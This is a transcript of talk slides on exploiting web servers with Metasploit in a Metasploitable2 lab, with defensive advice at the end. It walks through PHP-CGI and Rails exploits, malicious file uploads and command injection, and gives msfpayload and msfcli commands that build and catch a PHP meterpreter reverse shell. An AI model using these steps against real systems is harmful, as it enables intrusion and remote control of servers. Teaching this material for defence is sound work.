PowerPoint - Kernel Meltdown
Download
Report
Transcript PowerPoint - Kernel Meltdown
Dennis Maldonado
@DennisMald
Application Security Specialist
WhiteHat Security
Full-Time Student
University of Houston – Main Campus
▪ Computer Information Systems Major
Twitter
@DennisMald
Website / Blog
KernelMeltdown.org
Kali Linux – Our attacker machine
Metasploit Framework – Used for exploiting,
generating the payload, and establishing a
session with our victim.
Metasploitable2 – Victim Web Server
Exploiting the backend server through a web application.
Reasons why hackers want to compromise
the server:
Run attacks against the internal network
Use the server as a bot
Install backdoors onto the server
Reveal sensitive files/passwords
Execute any local file
Execute remote files
and more…
Vulnerabilities that are dangerous against a
server
Directory Traversal
Local File Inclusion
Remote File Inclusion
Remote Code Execution
SQL Injection
Command Injection
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/?page=index.php
http://website.com/
http://website.com/user.php?id=1&Submit=Submit#
Metasploit is an open-source framework used
for Security development and testing
Information gathering and fingerprinting
Exploitation/Penetration testing
Payload generation and encoding
Fuzzing
And much more…
Command Line Interfaces
msfconsole
msfcli
GUI Interfaces
Metasploit Community Edition
Armitage
Modules
Exploit – Exploitation/Proof-of-Concept code
▪ Ruby on Rails exploit
▪ PHP-CGI exploit
Auxiliary – Misc. modules for multiple purposes
▪
▪
▪
▪
Scanners
DDOS tools
Fingerprinting
Clients
Payloads – Code to be executed on the exploited system
▪ System Shells
▪ Meterpreter Shells
Post – Modules for post-exploitation tasks
▪ Persistence
▪ Password Stealing
▪ Pivoting
Active Exploits
Actively exploit a host.
Ex: Ruby on Rails XML exploit
Passive Exploits
Wait’s for incoming hosts, then exploits them
Ex: Java 0-days
Exploits contain payloads
Inline (Non Staged)
Payload containing the exploit and shell code
Stable
Large size
Staged
Exploits victim, establishes connection with attacker,
pulls down the payload
Meterpreter
Advanced, dynamic payload.
Extended over the network
Extensible through modules and plugins
Types of connections
Bind
▪ Local server gets started on victim machine
▪ Attacker connects to victim
▪ windows/x64/shell/bind_tcp
Reverse
▪ Local server gets started on attacker machine
▪ Victim connects to attacker
▪ windows/x64/shell/reverse_tcp
CVE 2012-1823
DOS attack
▪ -T 10000
Source code disclosure
▪ -s argument
Remote Code Execution
▪ -d argument
CVE-2013-0156
Easy to find, easy to
exploit, critical
vulnerability.
Requires just one
POST request
containing a specially
crafted XML data.
Send commands
through YAML objects
The upload functionality allows for any file
type to be uploaded
1. Upload server-side code and check if it executes
▪ PHP = <?php echo “Hello World!”; ?>
▪ ASP = <% Response.Write "Hello World!" %>
▪ JSP = <%= new java.util.Date().toString() %>
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the
victim
4. Upload the shell and execute it
Allows an attacker to execute system level
commands.
Attempt a safe command
1.
1.
2.
echo test
uname -a
2. Use msfpayload to create a shell
3. Use msfcli to listen for a connection from the victim
4. Inject curl or wget commands to download the shell
onto the victim machine.
5. Chmod if necessary and execute
msfpayload php/meterpreter/reverse_tcp O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337 O
msfpayload php/meterpreter/reverse_tcp LHOST=10.211.55.3
LPORT=1337 R > shell.php
# Now edit the shell.php file to remove the comment on the first line and
add "?>" at the end of the file.
==================================
msfcli multi/handler payload=php/meterpreter/reverse_tcp
lhost=10.211.55.3 lport=1337 E
Keep software up to date!
PHP: 5.4.3, 5.3.13
Ruby on Rails: 3.2.11, 3.1.10, 3.0.19, 2.3.15
Use whitelisting for file upload extensions
Watch for extensions and content-types
Don’t let upload directory be executable
Rename files if possible
Don’t pass user input as a system command!
Use library calls when possible
Sanitize input
BackTrack-Linux
The Metasploit Project
https://community.rapid7.com/community/metasploit/blog/2013/01/10/exploiting-ruby-on-rails-withmetasploit-cve-2013-0156
Damn Vulnerable Web Application (DVWA)
http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/
Ruby on Rails Exploitation
http://www.offensive-security.com/metasploit-unleashed/
PHP-CGI Advisory
http://www.metasploit.com/
Metasploit Unleashed
http://www.kali.org/
http://www.dvwa.co.uk/
Metasploitable 2
http://information.rapid7.com/download-metasploitable.html?LS=1631875&CS=web